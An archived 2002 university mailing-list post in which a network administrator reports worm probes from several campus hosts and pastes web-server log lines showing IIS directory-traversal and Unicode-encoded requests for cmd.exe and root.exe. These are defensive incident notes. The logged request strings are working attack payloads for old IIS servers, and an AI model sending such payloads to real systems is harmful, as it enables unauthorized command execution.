MSUNAG Archives

MSUNAG Archives


View:

Next Message | Previous Message
Next in Topic | Previous in Topic
Next by Same Author | Previous by Same Author
Chronologically | Most Recent First
Proportional Font | Monospaced Font

Options:

Join or Leave MSUNAG
Reply | Post New Message
Search Archives


Subject: MS Virus or Worm activity
From: Gene Willacker <[log in to unmask]>
Reply-To:MSU Network Administrators Group <[log in to unmask]>
Date:Mon, 21 Jan 2002 08:51:28 -0500
Content-Type:text/plain
Parts/Attachments:
Parts/Attachments

text/plain (53 lines) 


Probes from these hosts started coming in just before 11:00pm Saturday night:

35.8.164.90 - bigone.hrt.msu.edu
35.8.33.189 - fpc04.nscl.msu.edu
35.8.34.114 - cycpc54.nscl.msu.edu
35.8.33.203 - talon.nscl.msu.edu
35.8.107.198 - No host name in DNS. Domain: llc,
  Language Learning Center in Old Hort


Probe examples:

35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 286
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/syste
m32/cmd.exe?/c+dir HTTP/1.0" 404 343
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

--
Gene Willacker, Systems Analyst
MSU Division of Housing and Food Service
Food Stores Building
171 Service Road
East Lansing, MI 48824-1233
517-353-1691

Back to: Top of Message | Previous Page | Main MSUNAG Page

Permalink


LIST.MSU.EDU

CataList Email List Search Powered by the LISTSERV Email List Manager